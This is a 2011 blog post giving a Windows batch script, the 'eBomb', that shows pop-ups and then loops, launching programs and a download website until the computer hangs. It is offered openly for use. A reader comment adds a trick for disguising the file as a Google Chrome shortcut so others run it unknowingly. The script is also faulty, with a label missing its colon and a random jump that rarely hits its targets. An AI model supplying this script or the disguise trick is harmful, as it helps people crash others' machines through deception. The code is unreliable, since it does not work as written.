Monday, 28 November 2011

How To Create an eBomb

How To Create an eBomb

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls


begin
goto %random%

:1
start cmd.exe
goto begin

:2
start paint.exe
goto begin

:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "www.13downloads.com"
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

 Note:
 This filename.bat makes your pc slow because the above program code is to open multiple process at at time so that it make your pc hang.

2 comments:

  1. You could get a little trickier. Some people might notice and be weary of the icon a bat file uses. Put this file somewhere on the HD and create a shortcut to it in the desktop and assign an icon like Google Chrome ;)

    Cheers!

    http://bit.ly/viwTnS

    ReplyDelete
  2. yea it wud be kool B)
    @David

    ReplyDelete